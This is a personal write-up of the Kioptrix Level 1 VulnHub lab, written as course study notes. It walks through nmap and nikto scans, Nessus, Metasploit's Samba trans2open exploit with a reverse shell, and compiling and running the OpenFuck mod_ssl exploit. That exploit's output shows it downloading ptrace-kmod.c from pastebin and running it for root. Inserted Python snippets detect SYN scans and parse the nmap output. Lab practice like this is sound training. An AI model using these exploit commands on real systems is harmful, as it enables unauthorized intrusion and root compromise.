Write Up: Kioptrix 1

In this post I'm going to go over my experience working the Kioptrix Level 1 beginners box from VulnHub. This is essentially a write up and a set of study notes in one piece.

This post is based on my learning experience with Heath Adams' course, Practical Ethical Hacking. I followed all of Adams' steps and instructions so that I could learn his methodology and learn about tools I never even knew existed (because, you know, I've been at this for five minutes.)

Installation

Installing the VM was a pain in the arse but luckily the TCMSec team had me covered by having a working copy of the system in question. I won't post a link here as I'm unsure if I'm allowed to.

Breaking it down

Here are the steps taken:

  1. nmap scan of the host to discover possible entry points
  2. Hitting ports 80 and 443 in the browser to see what comes back
  3. Using nikto to scan the website for possible vulnerabilities
  4. Using DirBuster to find sub-directories and possibly sensitive files like backups and credentials
  5. Doing some manual searches to find exploits
  6. Executing Nessus to get some confirmation on the exploits found
  7. Using Metasploit Framework to root (pop) the system
  8. Using OpenFuck (spoiler alert!) to manually pop the system

The Scan - nmap

Here is an initial scan of the system. I used this nmap command:

nmap -T4 -p- -A $IP

This can be broken down as such:

  • -T4 - this is the speed at which nmap scans the target. This flag accepts a scale from 1-5
  • -p- - the ports to scan. In this case, - after the -p essentially means: everything
  • -A - this means scan All. It instructs nmap to scan everything it can possibly scan after finding an open port.

Adams points out that using -sS isn't a thing anymore. It's an old-school method of scanning a remote host without being detected. The flag can be translated to -scanStealth in "long form". It worked by initiating a TCP SYN, waiting for a TCP SYN/ACK, and then, instead of sending the second TCP ACK, sending a TCP RST, resetting the connection.
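As an added, defender-side illustration (not from the post or the course), the SYN, SYN/ACK, RST sequence just described is exactly the pattern a network sensor looks for to spot a half-open scan. The packet list is constructed: each tuple is (src, dst, server-side port, TCP flags), using the page's 10.0.2.15 scanner and 10.0.2.10 target plus an assumed legitimate client 10.0.2.20; the threshold of three ports is an assumption.

```python
from collections import defaultdict

# Constructed sample traffic as (src, dst, server_port, flags). The port is
# always the server-side port, so a reply SYN/ACK carries the same port value.
# Assumption: a real sensor would feed these from a pcap or firewall log.
SAMPLE_PACKETS = [
    ("10.0.2.15", "10.0.2.10", 22, "S"),   # scanner sends SYN
    ("10.0.2.10", "10.0.2.15", 22, "SA"),  # target answers SYN/ACK: port open
    ("10.0.2.15", "10.0.2.10", 22, "R"),   # scanner sends RST instead of ACK
    ("10.0.2.15", "10.0.2.10", 80, "S"),
    ("10.0.2.10", "10.0.2.15", 80, "SA"),
    ("10.0.2.15", "10.0.2.10", 80, "R"),
    ("10.0.2.15", "10.0.2.10", 139, "S"),
    ("10.0.2.10", "10.0.2.15", 139, "SA"),
    ("10.0.2.15", "10.0.2.10", 139, "R"),
    ("10.0.2.15", "10.0.2.10", 25, "S"),
    ("10.0.2.10", "10.0.2.15", 25, "RA"),  # closed port: no half-open here
    ("10.0.2.20", "10.0.2.10", 80, "S"),   # legitimate client: full handshake
    ("10.0.2.10", "10.0.2.20", 80, "SA"),
    ("10.0.2.20", "10.0.2.10", 80, "A"),
]

def half_open_ports(packets):
    """Map each client to the set of ports it reset right after a SYN/ACK."""
    stage = {}                      # (client, server, port) -> handshake stage
    half_open = defaultdict(set)
    for src, dst, port, flags in packets:
        if flags == "S":
            stage[(src, dst, port)] = "syn"
        elif flags == "SA" and stage.get((dst, src, port)) == "syn":
            stage[(dst, src, port)] = "synack"       # reply, so client is dst
        elif flags == "A" and stage.get((src, dst, port)) == "synack":
            stage[(src, dst, port)] = "established"  # normal third step
        elif flags == "R" and stage.get((src, dst, port)) == "synack":
            stage[(src, dst, port)] = "reset"        # the -sS tear-down
            half_open[src].add(port)
    return half_open

def syn_scanners(packets, threshold=3):
    """Sources that half-opened and reset at least `threshold` distinct ports."""
    return sorted(src for src, ports in half_open_ports(packets).items()
                  if len(ports) >= threshold)
```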

So the results of the scan for me turned out like this:

$ nmap -T4 -p- -A 10.0.2.10
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 08:37 AEST
Nmap scan report for 10.0.2.10
Host is up (0.00029s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-04-20T12:39:06+00:00; +14h00m30s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
32768/tcp open  status      1 (RPC #100024)

Host script results:
|_clock-skew: 14h00m29s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
The results from our nmap scan

So what did we find?

  • Ports 80 and 443, suggesting a website or websites are present;
  • Port 139, suggesting an SMB share is being hosted here;
  • Port 22 - nothing surprising here, except at this point it tells us we're dealing with Linux (guaranteed with this box given it was built in 2011, if not earlier, and OpenSSH wasn't available natively in Windows Server at that point.)
  • And port 32768, which is something called IBM FileNet. I've never heard of this before today.
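An added example, not part of the original write-up: a small parser over an excerpt of the scan above that pulls out the legacy-protocol indicators (SSHv1, SSLv2, TRACE, an expired certificate) a defender would ticket first. The excerpt lines and the 2021-04-20 scan date are taken from the page; the indicator strings are the ones nmap printed there.

```python
import re
from datetime import date

# Constructed excerpt of the nmap -A output above (the page's own lines, trimmed).
NMAP_OUTPUT = """\
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_Not valid after:  2010-09-26T09:32:06
| sslv2: 
|   SSLv2 supported
"""
SCAN_DATE = date(2021, 4, 20)   # date of the scan shown on the page

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# NSE output substrings that indicate obsolete or risky configuration.
INDICATORS = {
    "Server supports SSHv1": "SSHv1 enabled",
    "Potentially risky methods: TRACE": "HTTP TRACE enabled",
    "SSLv2 supported": "SSLv2 enabled",
}

def parse_nmap(text, scan_date=SCAN_DATE):
    """Return one dict per port line, each carrying findings from its NSE output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "findings": []})
            continue
        if not ports or not line.startswith("|"):
            continue                      # script lines belong to the last port
        ports[-1]["findings"] += [f for k, f in INDICATORS.items() if k in line]
        cert = re.search(r"Not valid after:\s+(\d{4}-\d{2}-\d{2})", line)
        if cert and date.fromisoformat(cert.group(1)) < scan_date:
            ports[-1]["findings"].append("TLS certificate expired")
    return ports

def risky_ports(text):
    """Port -> findings, for ports that raised at least one indicator."""
    return {p["port"]: p["findings"] for p in parse_nmap(text) if p["findings"]}
```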

Let's move on to enumerating the system further, starting with port 80.

Nikto

This great little tool was invoked as such:

nikto -h http://$IP/

And the results were fascinating:

$ nikto -h http://10.0.2.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.10
+ Target Hostname:    10.0.2.10
+ Target Port:        80
+ Start Time:         2021-04-20 19:58:26 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 13:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8707 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2021-04-20 20:00:08 (GMT10) (102 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Do note that nikto is considered "loud" and not always a good choice. Also treat the long run of "PHP backdoor" and router hits with suspicion: they are signatures for files belonging to software (WordPress, D-Link firmware) that nothing else in the scans suggests is installed here, so each one needs confirming by hand before it counts as a finding.

DirBuster

A nifty little tool, DirBuster was able to find a tonne of stuff such as Webalizer metrics/logs/visualisations and a testing PHP page.

I decided not to explore too much of this stuff except for the items Heath goes over in his course in the interest of time.

Manual Exploit Discovery

Before going into automatic exploit discovery, like Nessus (below), Heath teaches and encourages the student to Google around for exploits. Here is what I found.

These are the primary entry points. There are possibly others, perhaps via Webalizer, but I haven't trained in web exploitation yet, so I'm keeping this simple.

Nessus

In Heath's course we cover Nessus and run it against the Kioptrix 1 VM. Here is a screengrab of my results:

Kioptrix 1 under the microscope that is Nessus

It's safe to say this box has a few issues. Here's a screenshot showing the critical issues discovered:

So Nessus found a lot wrong with the system. Far more than we did manually searching for things.

Metasploit Framework - Getting root

Once we know what kind of options we have available to us we can search for exploits in MSF.

For Samba, I (and Nessus) found an exploit called trans2open. MSF has modules for this across multiple operating systems:

msf6 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

So we have:

  • exploit/freebsd/samba/trans2open
  • exploit/linux/samba/trans2open
  • exploit/osx/samba/trans2open
  • exploit/solaris/samba/trans2open

We know from our scans that we're dealing with a RedHat Linux host:

http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

Which we got from our nmap scan. Although not guaranteed to be accurate, given that we found port 22 running sshd and we detected Apache, it's very likely to be a Linux system.

To exploit the system we "load" the exploit/linux/samba/trans2open exploit:

msf6 > use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp

Notice the information re: "no payload configured". The default payload is a staged payload (it executes in stages, which is unstable and doesn't always work.) I tried the default and it failed.

Changing the payload is simple enough. Here's a list of available options (this is a screenshot due to the width/size of the output):

Because I tried the staged payload and it didn't work, I should now find and use a non-staged payload. The option we want is: linux/x86/shell_reverse_tcp. Knowing why this option is non-staged is covered by Heath, but a Google search should yield results.

After finding the correct module to load, setting a working payload, we can set the remote host and execute exploit:

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.0.2.10:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.10:32769) at 2021-04-26 15:28:12 +1000

whoami
root
hostname
kioptrix.level1


Manual Exploitation: OpenFuck

Although Metasploit Framework is used a lot in the real world, a lot of certifications, such as the OSCP, want you to manually exploit systems so that you can demonstrate an understanding of what the f- is going on.

With my basic Googling to uncover an exploit for Samba 2.2.1a I discovered OpenFuck.

It's a piece of C code that I am yet to fully understand, but I appreciate what it's doing. The steps to use this little gem are relatively simple:

  1. Install libssl-dev locally
  2. Compile the file using gcc: gcc -o OpenFuck OpenFuck.c -lcrypt
  3. Execute, providing the right flags: ./OpenFuck 0x6b 10.0.2.10 -c 40

The 0x6b selects the correct "payload", if you like, and the -c 40 sets the number of connections. I won't pretend to understand what the latter means.

Here's the entire output:

┌──(kali㉿kali)-[~/git/kioptrix_1/OpenLuck]
└─$ ./OpenFuck 0x6b 10.0.2.10 -c 40  

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80a8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt 
--15:39:24--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

15:39:25 (3.84 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status

whoami
root
hostname
kioptrix.level1

Enjoy.

Michael Crilly
